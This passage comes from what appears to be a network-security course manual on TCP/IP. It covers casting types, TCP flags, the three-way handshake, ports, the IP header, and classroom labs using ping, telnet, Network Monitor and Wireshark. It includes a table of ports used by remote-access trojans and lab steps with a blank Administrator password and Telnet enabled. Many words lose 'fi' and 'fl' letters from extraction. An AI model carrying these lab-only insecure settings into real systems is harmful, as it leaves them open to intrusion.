the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254,
and the broadcast address is 10.51.255.255, and so forth. Did you notice that you
have eight possible networks when you needed only ve? Again, you can con-
sider it just having more room for expansion.
X-casting
When a packet is sent from one host to another, the process of routing functions
and the packet is sent as dened. However, the process is different if one host is
trying to reach more than one destination, or if one message is to be received by
every other host in the network. These types of communication are referred to as
broadcasting, multicasting, and unicasting.
Unicast is a term that was created after multicasting and broadcasting were
already dened. A unicast is a directed communication between a single
transmitter and a single receiver. This is how most communication between
two hosts happens, with Host A specically communicating with Host B.
A broadcast is a communication that is sent out from a single transmitting
host and is destined for all possible receivers on a segment (generally, every-
one in the network, since the routers that direct traffic from one network to
another are generally used to stop broadcasts, thereby creating broadcast
domain boundaries). Broadcasting can be done for many reasons, such as
locating another host. For a MAC broadcast, the broadcast address used is
FF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on the
network settings. For example, if you are on network 192.168.10.0/24, the
broadcast address is 192.168.10.255.
A multicast is a communication that is sent out to a group of receivers on
the network. Multicasting is often implemented as a means for directing traf-
c from the presenter of a video conference to the audience. In comparison
to the broadcast, which all receivers on the segment will receive, those who
wish to receive a multicast must join a group to do so. Group membership is
often very dynamic and controlled by a user or an application. Currently,
Class D addresses are used for multicasting purposes. Remember, Class D
has IP addresses in the range of 224.0.0.0 to 239.255.255.255.
TASK 2A-2
Routers and Subnetting
1. You are using a host that has an IP address of 192.168.10.23 and a
subnet mask of 255.255.255.0. You are trying to reach a host with the IP
address 192.168.11.23. Will you need to go through a router? Explain
your response.
Yes, you will need to go through a router. Your subnet mask denes you as
belonging to network 192.168.10.0, and the remote host you are trying to
reach does not belong to your network.
2. Boot your computer to Windows Server 2003, and log on as Administra-
tor, with a blank (null) password.
44 Tactical Perimeter Defense
3. Choose StartSettingsNetwork Connections. Right-click the network
interface and choose Properties.
4. Select Internet Protocol (TCP/IP) and click Properties.
5. Click the Advanced button, and verify that the IP Settings tab is
displayed.
Under Default Gateways, record the IP address here:
For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. For
the RIGHT side, it is 172.18.0.1.
6. Select the Default Gateway IP address you just recorded, and click
Remove. Click OK twice and click Close twice.
7. Open a command prompt and ping an address that is not on your local
network. For instance, if you are on the LEFT side of the classroom, you
could ping an address in the 172.18.10.0 network, and if you are on the
RIGHT side of the classroom, you could ping an address in the 172.16.10.0
network.
8. Observe the message you receive. The text Destination Host unreachable
is displayed. Your computer knows that the ping packet is supposed to go to
a computer that is outside your local network but it does not know how to
get it there.
9. Switch to the Network Connections Control Panel and display the prop-
erties of the network interface.
10. Select Internet Protocol (TCP/IP), click Properties, and then click
Advanced. On the IP Settings tab, click the Add button found in the
Default Gateway area.
11. In the TCP/IP Gateway Address box, enter the IP address you recorded
earlier in the task and click Add. Click OK twice and click Close twice.
12. Switch back to the command prompt and try to ping the remote address
again.
13. Observe the message you receive. This time, as long as the other comput-
ers default gateway is correctly congured, you should be successful in
pinging the remote computer. This is because your computer now knows to
send traffic to the router if that traffic is destined for another network. (How
the routers know where to send the traffic is covered later in the course.)
Contact your instructor if your ping attempt is not successful.
14. Close all open windows.
Be prepared to diagram or
otherwise explain the
classroom setup.
The recommended classroom
layout is shown in the gure
in the setup.
Students must be able to
ping all computers within
the classroom for the
remaining tasks to work
properly. If any students are
not successful in the
second ping attempt, help
them troubleshoot the
issue.
Lesson 2: Advanced TCP/IP 45
Topic 2B
Analyzing the Three-way Handshake
Although a great deal of emphasis is given to IP due to the addressing and mask-
ing issues, TCP deserves equal attention from the security professional. In
addition to TCP, the other protocol that functions as a transport protocol is UDP.
This topic will concentrate on TCP; however, a brief discussion on UDP is
warranted. The following table provides a brief comparison of the two protocols.
Comparing TCP and UDP
TCP UDP
Connection-oriented Connectionless
Slower communications Faster communications
Considered reliable Considered unreliable
Transport Layer Transport Layer
TCP provides a connection-oriented means of communication, whereas UDP pro-
vides connectionless communication. The connection-oriented function of TCP
means it can ensure reliable transmission, and can recover if transmission errors
occur. The connectionless function of UDP means that packets are sent with the
understanding they will make it to the other host, with no means of ensuring the
reliability of the transmission.
UDP is considered faster because less work is done between the two hosts that
are communicating. Host 1 simply sends a packet to the address of host 2. There
is nothing built into UDP to provide for host 1 checking to see if host 2 received
the packet, or for host 2 sending a message back to host 1, acknowledging
receipt.
TCP provides the functions of connection-oriented communication by using fea-
tures such as the three-way handshake, acknowledgements, and sequence
numbers. In addition to these features, a signicant part of TCP is the use of con-
trol ags. There are six TCP control ags in a TCP header, each with a specic
meaning.
security:
A condition that results from
the establishment and
maintenance of protective
measures that ensure a state
of inviolability from hostile
acts or inuences.
46 Tactical Perimeter Defense
TCP Flags
The TCP ags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These ags
may also be identied as S, ack, F, R, P, and urg. Each of these ags occupies
the space of one bit in the header, and if they are assigned a value of 1, they are
considered on. The function of each ag is identied as follows:
The SYN, or S, ag represents the rst part of establishing a connection.
The synchronizing of communication will generally be in the rst packet of
communication.
The ACK, or ack, ag represents acknowledgement of receipt of data from
the sending host. This is sent during the second part of establishing a con-
nection, in response to the sending hosts SYN request.
The FIN, or F, ag represents the senders intentions of terminating the com-
munication in what is known as a graceful manner.
The RESET, or R, ag represents the senders intentions to reset the
communication.
The PUSH, or P, ag is used when the sending host requires data to be
pushed directly to the receiving application, and not ll in a buffer.
The URGENT, or urg, ag represents that this data should take precedence
over other data transmissions.
Sequence and Acknowledgement Numbers
In addition to the TCP ags, another critical issue of TCP is that of numbers:
sequence and acknowledgement numbers, to be specic. Because TCP has been
dened as a reliable protocol that has the ability to provide for connection-
oriented communication, there must be a mechanism to provide these features.
Sequence and acknowledgement numbers are what provide this.
Sequence Numbers
The sequence number is found in the TCP header of each TCP packet and is a
32-bit value. These numbers allow the two hosts a common ground for communi-
cation, and allow for the hosts to identify packets sent and received. If a large
web page requires several TCP packets for transmission, sequence numbers are
used by the receiving host to reassemble the packets in the proper order and pro-
vide the full web page for viewing.
When a host sends the request to initiate a new connection, an Initial Sequence
Number (ISN) must be chosen. There are different algorithms by different ven-
dors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a
32-bit number that increments by one every 4 microseconds.
Acknowledgement Numbers
The acknowledgement number is also found in the TCP header of each TCP
packet, and is also a 32-bit value. These numbers allow the two hosts to be given
a receipt of data delivery. An acknowledgement number is in the packet header in
response to a sequence number in the sending packet.
In the event that the sending host does not receive an acknowledgement for a
transmitted packet in the dened timeframe, the sender will retransmit the packet.
This is how TCP provides reliable delivery. If a packet seems to have been lost,
the sender will retransmit it.
Lesson 2: Advanced TCP/IP 47
Connections
All communication in TCP/IP is done with connections between two hosts. Each
connection is opened (or established), data is sent, and the connection is closed
(or torn down). These connections have very specic rules they must follow.
There are two different states of the open portion of this process: Passive Open
and Active Open.
Passive Open is when a running application tells TCP that it is ready to
receive inbound requests via TCP. The application is assuming inbound
requests are coming, and is prepared to serve those requests. This is also
known as the listening state, as the application is listening for requests to
communicate.
Active Open is when a running application tells TCP to start a communica-
tion session with a remote host (which is in Passive Open state). It is
possible for two hosts in Active Open to begin communication. It is not a
requirement that the remote host be in Passive Open, but that is the most
common scenario.
Connection Establishment
In order for the sequence and acknowledgement numbers to have any function, a
session between the two hosts must be established. This connection establishment
is called the three-way handshake. The three-way handshake involves three dis-
tinct steps, which are detailed as follows (please refer to Figure 2-5 when reading
this section):
1. Host A sends a segment to Host C with the following:
SYN = 1 (The session is being synchronized.)
ACK = 0 (There is no value in the ACK eld, so this ag is a 0.)
Sequence Number = x, where x is a variable. (x is Host As ISN.)
Acknowledgement Number = 0
2. Host C receives Host As segment and responds to Host A with the follow-
ing:
SYN = 1 (The session is still being synchronized.)
ACK = 1 (The acknowledgement ag is now set, as there is an ack
value in this segment.)
Sequence Number = y, where y is a variable. (y is Host Cs ISN.)
Acknowledgement Number = x + 1 (The sequence number from Host
A, plus 1.)
3. Host A receives Host Cs segment and responds to Host C with the follow-
ing:
SYN = 0 (Session is synchronized with this segment; further requests
are not needed.)
ACK = 1 (The ack ag is set in response to the SYN from the previous
segment.)
Sequence Number = x + 1 (This is the next sequence number in series.)
Acknowledgement Number = y + 1 (The sequence number from Host
C, plus 1.)
At this point, the hosts are synchronized and the session is established in both
directions, with data transfer to follow.
48 Tactical Perimeter Defense
Figure 2-5: The three-way handshake.
Connection Termination
In addition to specic steps that are involved in the establishment of a session
between two hosts, there are equally specic steps in the termination of the
session. There are two methods of ending a session using TCP. One is considered
graceful, and the other is non-graceful.
A graceful shutdown happens when one host sends a message (using the FIN
ag) to the other, stating it is time to end the session; the other acknowledges;
and they both end the session. A non-graceful shutdown happens when one host
simply sends a message (using the RESET ag) to the other, indicating the com-
munication has stopped, with no acknowledgements and no further messages sent.
In this section, we will investigate the details of the standard graceful termination.
As you saw earlier, it requires three segments to establish a TCP session between
two hosts. The other side of the session, the graceful termination, requires four
segments. Four segments are required because TCP is a full-duplex communica-
tion protocol (meaning data can be owing in both directions independently). As
per the specications of TCP, either end of a communication can end the session
by sending a FIN, which has a sequence number just as a SYN has a sequence
number.
Similar to the Active and Passive Opens mentioned earlier, there are also Active
and Passive Closes. The host that begins the termination sequence, by sending the
rst FIN, is the host performing the Active Close. The host that receives the rst
FIN is the host that is performing the Passive Close. The graceful teardown of a
session is detailed as follows (please refer to Figure 2-6 when reading this sec-
tion):
1. Host A initiates the session termination to Host C with the following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number, based on current communication.)
Sequence Number (FIN number) = s (s is a variable based on the cur-
rent communication.)
Acknowledgement Number = p (p is a variable based on the current
communication.)
2. Host C receives Host As segment and replies with the following:
FIN = 0 (This segment is not requesting closure of the session.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present (As there is no FIN, there is no
sequence number required.)
Lesson 2: Advanced TCP/IP 49
Acknowledgement Number = s + 1 (This is the response to Host As
FIN.)
3. Host C initiates the session termination in the opposite direction with the
following:
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number.)
Sequence Number = p (p is a variable based on the current
communication.)
Acknowledgement Number = s + 1 (This is the same as in the previous
segment.)
4. Host A receives the segments from Host C and replies with the following:
FIN = 0 (This segment does not request a termination, there is no
SYN.)
ACK = 1 (This segment does contain an ack number.)
Sequence Number = Not Present
Acknowledgement Number = p + 1 (This is Host Cs sequence number,
plus 1.)
At this point the session has been terminated. Communication in both directions
has had a FIN requested and an acknowledgement to the FIN, closing the session.
Figure 2-6: Connection termination.
Ports
You have been introduced to the fact that IP deals with addressing and the
sending/receiving of data between two hosts, and you have been introduced to the
fact that TCP can be selected to provide reliable delivery of data. However, if a
client sends a request to a server that is running many services, such as WWW,
NNTP, SMTP, and FTP, how does the server know which application is supposed
to receive the request? The answer is by specifying ports.
50 Tactical Perimeter Defense
Port numbers are located in the TCP or UDP header, and they are 16-bit values,
ranging from 0 to 65535. Port numbers can be assigned to specic functions or
applications. Ports can also be left open for dynamic use by two hosts during
communication. There are ranges of ports for each function. There are three main
categories of ports: well-known, registered, and dynamic.
The well-known ports (also called reserved ports by some) are those in the
range of 0 to 1023. These port numbers are assigned to specic applications
and need to remain constant for the primary services of the Internet to con-
tinue to provide the exibility and usefulness it does today. For example, the
WWW service is port 80, the Telnet service is port 23, the SMTP service is
port 25, and so on. The well-known port list is maintained by the Internet
Assigned Numbers Authority (IANA), and can be found here:
www.iana.org/assignments/port-numbers.
Registered ports are those in the range of 1024 to 49151. These port num-
bers can be registered to a specic function, but are not dened or controlled
by a governing body, so multiple functions could end up using the same
port.
Dynamic ports (also called private ports) are those from 49152 to 65535.
Any user of the Internet can use dynamic ports.
When a client connects to a server and requests a resource, that client also
requires a port. The client ports (also called ephemeral ports by some) are used
by a client during one specic connection; each subsequent connection will use a
different port number. These ports are not assigned to any default service, and are
usually a number greater than 1023. There is no dened range for client ports;
they can cover the numbers of both the registered and dynamic port ranges.
When a client begins a session by requesting a service from a server, such as the
WWW service on port 80, the client uses an ephemeral port on the client side.
This enables the server to respond to the client. Data is then exchanged between
the two hosts using the port numbers established for that session: 80 on the
server side, and a dynamic number greater than 1023 on the client side. The com-
bination of the IP address and port is often referred to as a socket, and the two
hosts together are using a socket pair to communicate for this session.
The following table lists some of the well-known ports and their associated
services.
Some Well-known Ports and their Services
Port Service
23 Telnet
80 HTTP (Standard web pages)
443 Secure HTTP (Secure web pages)
20 and 21 FTP (Data and control)
53 DNS
25 SMTP
119 NNTP
Lesson 2: Advanced TCP/IP 51
In addition to known valid services, such as those listed previously, there are
many Trojan Horse programs that use specic ports (although the port can usu-
ally be changed).
Ports Associated with Trojan Horses
Port Number Name of Trojan Horse
12345 NetBus
1243 Sub Seven
27374 Sub Seven 2.1
31337 Back Orice
54320 (TCP) Back Orice 2000 (BO2K)
54321 (UDP) Back Orice 2000 (BO2K)
Network Monitor
There is a very valuable tool available with Windows called Network Monitor.
This tool allows for full packet capture and lets the analyst (you) peer into the
packets contents, examining both the payload, or data, and the headers, in detail.
You can see any set agss dened sequence and acknowledgement numbers,
packet size, and more. The following is a discussion on the use of Network
Monitor, provided as background for you to be able to perform the tasks in this
lesson.
Some of the things you can do with Network Monitor are:
Monitor real-time network traffic.
Analyze network traffic.
Filter specic protocols to capture.
In this lesson, you will be focusing on the capture and analysis of IP packets, and
on the details of the protocol suite.
Trojan Horse:
An apparently useful and
innocent program containing
additional hidden code which
allows the unauthorized
collection, exploitation,
falsication, or destruction of
data.
52 Tactical Perimeter Defense
Figure 2-7: The default view of Network Monitor, showing the various panes.
In Figure 2-7, you can see the default view of Network Monitor. In this view, the
screen is split into several sections.
The top bar is the standard menu bar found in Microsoft programs. The basic
functions on the toolbar that you will use in this lesson are contained in the File
and Capture menus.
The File menu contains three commands: Open, Save As, and Exit.
Choose Open to open a previously saved Network Monitor capture.
Choose Save As to save a Network Monitor capture.
Choose Exit to exit.
The Capture menu has more commands: Start, Stop, Stop And View, Pause,
and Continue.
The Start, Pause, and Continue commands are self-explanatory.
The difference between Stop and Stop And View is that the Stop com-
mand ends the capture. The Stop And View command ends the capture
and switches Network Monitor to its next mode, Display View.
The other sections of the Capture View are panes (windows in a window) called
Graph, Session Stats, Station Stats, and Total Stats.
The Graph pane provides ve bars that measure percentages of pre-dened
metrics.
The top graph indicates the percentage (%) of network utilization,
meaning how much the network is being used.
The second graph indicates the number of frames per second, meaning
frames transmitted per second over the network.
The third graph indicates the number of bytes per second that are trans-
mitted over the network.
Lesson 2: Advanced TCP/IP 53
The fourth graph indicates the number of broadcasts per second that are
transmitted over the network.
The fth graph indicates the number of multicasts per second that are
transmitted over the network.
While a capture is running, these graphs work in real time, providing
current data.
The next pane is the Session Stats pane. In this pane, you can see the ses-
sions that are taking place during the capture.
Following the Session Stats is the Station Stats pane. In this pane, you can
see statistics per interface on the host, per broadcast, per multicast, and
more.
The nal pane in this view is the Total Stats pane. The Total Stats pane is
subdivided into sections: Network Statistics, Captured Statistics, Per Second
Statistics, Network Card (MAC) Statistics, and Network Card (MAC) Error
Statistics. From this pane, you can identify frames, broadcasts, multicasts,
network utilization, errors, and more, all in real time during the capture.
Displaying Captures
After you have captured network traffic, you can begin your analysis, which
requires a different view of Network Monitor. You will need to use the Display
View. You can switch to the Display View by either using the CaptureStop And
View command or by using the Display Captured Data command after a capture
session has been stopped.
Figure 2-8: The Summary View of Network Monitor.
When you rst open the Summary View, as shown in Figure 2-8, you will see a
timeline of packets captured. By double-clicking any packet that was captured,
you can look into its details and bring up the next view of Network Monitor.
Once you have selected a packet, Network Monitor displays three panes for pre-
senting information to you.
54 Tactical Perimeter Defense
Figure 2-9: The details of a packet in Network Monitor.
The top pane shown in Figure 2-9 is the Summary pane. This pane provides the
basic details of a packet, such as:
Frame number
Time the packet was captured
Destination and source MAC addresses
Protocol used
Destination and source IP addresses
The middle pane shown in Figure 2-9 is the Detail pane. This pane provides the
actual details of the protocol for the selected packet. Any line that has a plus sign
next to it can be expanded for further detail.
The bottom pane in Figure 2-9 is the Hex pane. This pane provides the actual
Hex value for the raw data that each frame is comprised of. When you select
something in the Detail pane, it is highlighted in the Hex pane for comparison.
Also, in this pane, the ASCII characters are visible. In the event that cleartext is
captured, this is where it will be readable.
Network Monitor Filters
Because Network Monitor has the ability to capture all network traffic, it would
be very easy to capture too much information and have difficulty in nding what
you were looking for. This is where ltering comes into play. There are two types
of lters available in Network Monitor: capture lters and display lters. For
example, if you wanted to capture only TCP messages, you could create a capture
lter so that only TCP messages are captured. If you wanted to view only ICMP
messages, you could create a display lter so that all you see are ICMP
messages. Figure 2-10 and Figure 2-11 show the dialog boxes used for each lter
type.
Lesson 2: Advanced TCP/IP 55
To create or use lters, choose CaptureFilter. Using lters not only makes it
easier for you, as an analyst, to nd what you are looking for, but they allow for
the buffer that stores the capture to not be lled with useless information.
Figure 2-10: Network Monitors Capture Filter dialog box.
Figure 2-11 shows the Display Filter dialog box.
Figure 2-11: Network Monitors Display Filter dialog box.
56 Tactical Perimeter Defense
When using ltering, you will likely use either protocol or address ltering. With
protocol ltering, you identify a specic protocol to work with. With address l-
tering, you again dene the specic address to lter. Filters can be implemented
in different directions, either traffic into this host, outbound from this host, or in
both directions. These options are implemented by selecting the appropriate arrow
(one of these three: --->, ---<, or <-->) for the function you want to
perform.
TASK 2B-1
Using Network Monitor
1. Open a command prompt, and enter ipcong /all
If you are on the LEFT side of the classroom, your IP addresses will be 172.
16.10.x. If you are on the RIGHT side of the classroom, your IP addresses
will be 172.18.10.x.
2. Record the MAC and IP address for the network card in your computer.
MAC address Each card will have a unique MAC address.
IP address Each card will have a unique IP address.
3. Close the Command Prompt window.
4. Open Network Monitor. (From the Start menu, choose All Programs
Administrative ToolsNetwork Monitor.)
5. If you see the Microsoft Network Monitor message box, click OK to display
the Select A Network dialog box. Expand the + sign next to Local Com-
puter, select the interface with the MAC address associated with the
network interface you recorded in Step 2, and click OK.
6. From the Capture menu, choose Start, or press F10 to start a capture.
7. If you are on the LEFT side of the classroom, ping the IP address 172.16.
0.1. If you are on the RIGHT side of the classroom, ping the IP address
172.18.0.1. This will create network traffic for you to capture.
8. Wait for 20 to 30 seconds. As you wait, watch the real time statistics
change in the Network Monitor Capture window.
9. Choose CaptureStop And View. You should now see the Display View,
including the timeline of the packets captured.
10. Double-click any packet to change to the Detail View.
11. Observe the structure of the three panes in this view, and expand any +
signs displayed in the middle pane.
12. From the Display menu, choose Filter.
13. Highlight Protocol==Any, and click the Edit Expression button.
Lesson 2: Advanced TCP/IP 57
14. With the Protocol tab selected, click the Disable All button.
15. Scroll down to ICMP, select ICMP, and click the Enable button. The
Expression eld at the top of the dialog box should now display Protocol ==
ICMP. Click OK.
16. Click OK to implement this lter on your capture.
17. Observe that only ICMP frames are visible in your window now.
18. From the File menu, choose Save As, and save the capture as First_
Capture.cap in the default location.
19. Close Network Monitor.
Wireshark
Another product you can use to capture data is called Wireshark. (Wireshark was
formerly known as Ethereal, with the name change taking place in 2006.) With
Wireshark, data can be captured off the wire or read from a captured le. Data
can also be saved to a le format that Microsoft Network Monitor can
understand. Wireshark supports analysis on over 750 Data Link, Network, Trans-
port, and Application layer protocols. Wireshark can be downloaded from
www.wireshark.org
To perform promiscuous mode captures on a Windows machine, you have to rst
download and install the latest stable version of WinPcap; do not install any alpha
or beta versions. WinPcap is the Windows equivalent of libpcap (LIBrary for
Packet CAPtures) for Linux. It can be obtained from www.winpcap.org. In fact,
you will use WinPcap later in the course, along with other tools such as
windump, tcpdump, nmap, and snort.
TASK 2B-2
Installing and Starting Wireshark
1. Choose StartMy Computer.
2. Open C:\Tools\Lesson2.. Note: If you do not have a C:\Tools folder, please
review the tools section of the Setup Guide.
3. Double-click the WinPcap_4_0.exe le.
4. In the WinPcap_4_0.exe Installer Welcome screen, click Next.
5. In the WinPcap 4.0 Setup Wizard screen, click Next.
6. Read the License Agreement, and click I Agree.
7. To close the WinPcap install wizard, click Finish.
8. Double click the Wireshark_setup-0.99.5.exe le.
9. In the Wireshark Setup Wizard Welcome screen, click Next.
promiscuous mode:
Normally an Ethernet
interface reads all address
information and accepts
follow-on packets only
destined for itself, but when
the interface is in
promiscuous mode, it reads
all information (sniffer),
regardless of its destination.
58 Tactical Perimeter Defense
10. Read the License Agreement, and click I Agree.
11. Accept the Default Components (do not make any changes), and click Next.
12. Accept the Default Additional Tasks (do not make any changes), and click
Next.
13. Accept the Default Destination Folder, and click Next.
14. You have already installed WinPcap, so do not check any boxes on the
WinPcap screen, and click Install.
15. In the Installation Complete screen, click Next.
16. In the Completing The Wireshark 0.99.5 Setup Wizard, check the Run
Wireshark0.99.5 check box and click Finish.
17. Leave Wireshark open for the following tasks.
Wireshark Overview
When you rst start Wireshark (formerly called Ethereal), you will see a GUI
with three panes. The top pane lists the captured frames in sequence. When you
highlight a frame, the middle pane provides protocol layer information about that
frame, and the bottom pane shows the details of the frame in both Hex and
ASCII values.
Figure 2-12: The Ethereal (Wireshark) GUI.
Lesson 2: Advanced TCP/IP 59
At the top of the GUI there is a menu bar, with File, Edit, View, Go, Capture,
Analyze, Statistics, and Help. Just above the top pane is a Filter button, a drop-
down menu, an Expression button, a Clear button, and an Apply button. These
buttons allow you to lter through the captured data, which as you will see, is a
very important feature.
When you wish to start a capture in Wireshark, you have several options. You
can go to the Capture drop-down menu and select Start or you can simply press
the third icon from the right in the icons listed just below the main menu bar.
However, as this is the rst time you are running Wireshark, you must dene
some options. A quick way to the option screen is to press Ctrl+K combination.
When you do so, you will see a window that has many options, where you can
make some specic selections, including the following:
The interface to capture packets from.
The limit to the number of packets to capture (if any).
Whether you wish to capture packets in promiscuous mode or not.
Any lters you wish to use.
The le name for the capture le.
If you wish to view the packets onscreen in real time.
Parameters to dene when the capture should stop.
Whether you wish to enable or disable name resolution at the Data Link,
Network, and Transport layers.
60 Tactical Perimeter Defense
Figure 2-13: Ethereal (Wiresharks) Capture Options dialog box.
When you click OK, capture will start on the selected network interface and you
will see another pop-up informing you that. Wireshark will continue with the cap-
ture until you click the Stop button.
Figure 2-14: Ethereal (Wireshark) pop-up displaying capture information.
Lesson 2: Advanced TCP/IP 61
Once you have selected your options and clicked OK, the capture will start on
the selected network interface, and you will see a pop-up window informing you
of the capture in progress. Wireshark will continue with the capture until you
press the Stop button or an option you congured tells the capture to stop.
Figure 2-15: The many Save As options in Ethereal (Wireshark).
After you stop a capture, you can view and analyze the data for your current use.
You when you are done and wish to save the le for future analysis, you have
many options.
Notice how many choices you have for saving a captureyou can save to Net-
work Monitors format if you want. (Conversely, Wireshark will read a capture
saved by any of the protocol analyzers in the list.) When you are done with cap-
ture and analysis and want to close the program, choose FileQuit or press
Ctrl+Q.
TASK 2B-3
Using Wireshark
Setup: Wireshark has been successfully installed and is running on
your computer.
1. From the menu options, choose CaptureOptions.
2. In the Interface drop-down list, select you local area network adapter.
3. Notice that when you select your adapter, directly below the word Inter-
face, the program has listed your LAN address.
62 Tactical Perimeter Defense
4. Make sure that the Capture Packets In Promiscuous Mode check box is
checked.
5. Under Display Options, check the Update List Of Packets In Real Time
check box.
6. Click the Start button and open a command prompt.
7. Ping your Default Gateway IP Address.
8. When the ping has completed, close the command prompt, return to
Wireshark, and choose CaptureStop.
9. Double-click any frame where your computer is the Source and the Des-
tination is the Default Gateway IP Address you just pinged. The protocol
will be listed as ICMP.
10. Expand and view the frame details.
11. Note that you can analyze data in a similar fashion as in Network
Monitor.
12. Once you are done with this initial look at Wireshark, close the application.
13. Click the Continue Without Saving button.
TCP Connections
Earlier, you were introduced to the function and the process of control ags, the
three-way handshake, and the session teardown. In this section, you are going to
use Network Monitor to view the three-way handshake, packet by packet, and to
view the teardown, packet by packet.
Remember, the three-way handshake is used by two hosts when they are creating
a session. The rst host begins by sending out a packet with the SYN ag set,
and no other ags. The second packet is a response with both the SYN and ACK
ags set. The third part of the session establishment will have the ACK ag set.
TASK 2B-4
Analyzing the Three-way Handshake
1. Choose StartAdministrative ToolsServices.
2. Right-click Telnet and choose Properties.
3. In the Startup type drop-down menu, select manual.
4. Click Apply.
5. Click the Start button.
6. Click OK.
Lesson 2: Advanced TCP/IP 63
7. Close the Services window.
8. Open Network Monitor, and start a capture.
9. At a command prompt:
If you are on the LEFT side of the classroom, enter telnet 172.16.0.1
If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1
Enter y, at the Login type anonymous press Enter, and at the Password
prompt, press Enter.
10. Press Enter repeatedly or a bad password until your connection to the
host is lost. Your screen may resemble the following graphic.
Minimize the command prompt window.
11. Switch back to Network Monitor, and choose CaptureStop And View.
12. In the Summary pane, identify the frames that are involved in the three-
way handshake.
13. Once you have identied the frames that are part of the three-way hand-
shake, based on the discussion, look for the following:
a. In the rst frame, what are the SEQ number, ACK number, and ags?
b. In the second frame, what are the SEQ number, ACK number, and
ags?
c. In the third frame, what are the SEQ number, ACK number, and ags?
14. Expand each of the three frames in the handshake, and examine them in
greater detail in the Detail pane.
15. Using the Hex pane, identify the value for the ags that are set for each
frame of the three-way handshake.
16. Leave Network Monitor open, along with this capture, for the next task.
The Session Teardown Process
Previously, you examined the session teardown process. Here, you will examine
the details of the session teardown. Remember, there are four parts of session
teardown.
64 Tactical Perimeter Defense
TASK 2B-5
Analyzing the Session Teardown Process
Setup: Network Monitor is running, and the last capture you per-
formed is displayed.
1. In the Summary pane, identify the frames that are involved in the session
teardown.
2. Once you have identied the frames, examine them in greater detail in the
Detail pane.
3. In each frame, identify at least the following:
a. Flags that are set.
b. Sequence number.
c. Acknowledgement number.
4. Save the capture as TCP_Connections.cap and close the capture.
5. Minimize Network Monitor.
Topic 2C
Capturing and Identifying IP Datagrams
Along with TCP, the protocol you will spend the most time analyzing will be IP.
This protocol is the one that does the most work of the entire TCP/IP suite. In
Figure 2-16, you can see the actual format of the IP datagram. There are seven
rows of information in the gure, with the critical rows being the rst ve. When
a computer receives an IP datagram, it will begin reading on Row One on the left
side, bit by bit. Once it reads through Row One, it will read Row Two, and so
on.
To work with IP further, refer
to RFC 791.
Lesson 2: Advanced TCP/IP 65
Figure 2-16: An IP datagram with all elds shown.
Using Figure 2-16, we will move through the header, identifying the function of
each area. After identifying the header elds, we will use Network Monitor to
capture and analyze the IP header.
Starting on Row One, on the left side is a eld called Version. This is a 4-bit
eld that denes the version of IP that is currently running. Right now, this
will likely be a value of 4, as that is the current industry standardIPv4, or
IP version 4. Some instances may be using IP version 6, or IPv6, which you
will examine later in the course.
Moving to the right of the Version is a eld called Header Length (IHL).
This is a 4-bit eld that denes the number of 32-bit words in the header
itself, including options. In most captures, this value will be 5, for no
options set, the normal value.
Continuing to the right of Header Length is a eld called Type Of Service.
This is an 8-bit eld that denes the quality of service for this packet. Dif-
ferent applications may require different needs of available bandwidth, and
Type Of Service is one way of addressing those needs.
The last eld on Row One is the eld called Total Length. This is a 16-bit
eld that denes the length of the entire IP datagram in bytes.
Starting on Row Two, on the left side is a eld called Identication. This is
a 16-bit eld that denes each datagram sent by the host. The standard for
this eld is for the identication value to increment by one for every
datagram sent.
Following the Identication eld is a eld called Flags. Not to be confused
with the ags of TCP, which you have seen, this is a 3-bit eld that is used
in conjunction with fragmentation. The rst of the three bits is to be set at 0,
66 Tactical Perimeter Defense
as a default. The next bit is known as the DF bit, or Dont Fragment. The
third bit is known as the MF bit, or More Fragment.
The last eld on Row Two is a eld called Fragment Offset. This is a 13-bit
eld that is used to dene where in the datagram this fragment belongs. (If
there is fragmentation, the rst fragment will have an offset of 0.)
Starting on Row Three, on the left side, is a eld called Time To Live. This
is an 8-bit eld that is used to dene the maximum amount of time this
datagram may be allowed to exist in the network. The TTL is created by the
sender and lowers by 1 for every router that the datagram crosses. If the
TTL reaches 0, the packet is to be discarded.
Moving to the right is a eld called Protocol. This is an 8-bit eld that is
used to dene the upper-layer protocol that is in use for this datagram. There
are many unique protocol numbers, and if you wish to study all of the num-
bers, please refer to RFC 790. However, the following list identies several
important Protocol ID numbers:
Protocol ID Number 1: ICMP
Protocol ID Number 6: TCP
Protocol ID Number 17: UDP
The nal eld on Row Three is a eld called Header Checksum. This is a
16-bit eld that is used to provide a check on the IP header only; this is not
a checksum for any data following the header. This checksum provides
integrity for the header itself.
The Fourth Row is a single eld, the Source IP Address. This eld is a
32-bit value that identies the IP address of the source host of this packet.
The Fifth Row is also a single eld, the Destination IP Address. This eld is
a 32-bit value that identies the IP address of the destination host for this
packet.
The Sixth Row contains any options that may be present. This is a variable,
with no absolute xed size to the options. Some of the options that may be
in this eld are those that are related to routing or timekeeping. If options
are used, there will be padding added so this eld equals 32 bits in size.
The Seventh and nal Row is the representation of the data. By this point,
the header is complete and the data the user wishes to send or receive is
stored in the packet.
TASK 2C-1
Capturing and Identifying IP Datagrams
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. In Network Monitor, start a new capture, and leave the capture
running.
2. Open a command prompt and enter ftp ip_address where
ip_address is the address of a neighbor computer.
integrity:
Assuring information will not
be accidentally or
maliciously altered or
destroyed.
Lesson 2: Advanced TCP/IP 67
3. At this time, the connection will not be successful, type bye and close the
command prompt.
4. Return to Network Monitor and choose CaptureStop And View.
5. Observe the Protocol column. Apply a lter to only show TCP. For the
specic steps, see Task 2B-1, step 12 through step 16. Click any of the
frames and observe that the TCP control bits includes FTP.
6. Examine the IP header, compared to the discussion. Look for the following:
a. Version Number.
b. Time To Live.
c. Protocol ID.
d. Source Address.
e. Destination Address.
7. Once you are done examining the IP header, save the capture as
IP_Header.cap and close the capture le.
Topic 2D
Capturing and Identifying ICMP Messages
When you are analyzing protocols, it should become immediately apparent that
there are differences between ICMP and the other protocols discussed in this
lesson. There is a similar concept in that the ICMP message is encapsulated in
the IP datagram, just as you saw with TCP and UDP. In Figure 2-17, you can see
